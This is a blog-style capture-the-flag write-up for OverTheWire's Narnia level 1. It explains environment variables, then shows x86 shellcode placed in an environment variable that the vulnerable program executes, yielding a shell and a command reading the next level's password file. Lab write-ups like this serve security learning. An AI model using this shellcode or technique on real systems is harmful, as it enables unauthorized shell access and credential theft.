Overthewire.org - Narnia 1 -> 2

Write-Up

Posted on February 2, 2017 as Overthewire. 2 minutes read.

Introduction

Another month, another challenge, next part of OverTheWire's Narnia wargames. Unfortunately lack of time, made it impossible for me to publish anything sooner. Sorry for that!

Challenge

Firstly let's take a look at the code of the program.

#include <stdio.h>

int main(){
	int (*ret)();

	if(getenv("EGG")==NULL){    
		printf("Give me something to execute at the env-variable EGG\n");
		exit(1);
	}

	printf("Trying to execute EGG!\n");
	ret = getenv("EGG");
	ret();

	return 0;
}

The first thing that I see is that this program will check, whether or not the value of EGG variable is empty, if yes, it will print the message. But if not, it will try to execute it.

But what is enviromental variable?

Every time shell session is started, process is gathering information that should be available to the shell process and all child processes, putting them in special area called enviroment.

Enviromental variables provide a way to influence the behaviour of software on the system. For example, the "LANG" environment variable determines the language in which software programs communicate with the user. They are represented as an key-value pairs.

KEY=VALUE
KEY=VALUE1:VALUE2
KEY="VALUE WITH SPACES"

Now when we understand the topic, let's try to set EGG variable as some random text possibly causing the program to crash.

[email protected]:/narnia$ export "EGG"="completelyrandomtext"
[email protected]:/narnia$ ./narnia1
Trying to execute EGG!
Segmentation fault

Yes! Now let's try and find some x86 shellcode that will be executed by the program. What I found working, was this shellcode, which was actually second one I've tried - the first one didn't want to cooperate ;)

[email protected]:/narnia$ export "EGG"=$'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80'
[email protected]:/narnia$ ./narnia1
Trying to execute EGG!
$ whoami
narnia2
$ cat /etc/narnia_pass/narnia2

We have the password to the next level!

Conclusion

It was another great challenge from OverTheWire. I'm looking forward to the next one, maybe something a little bit harder? We'll see!

Keep learning and stay safe!

~ W3ndige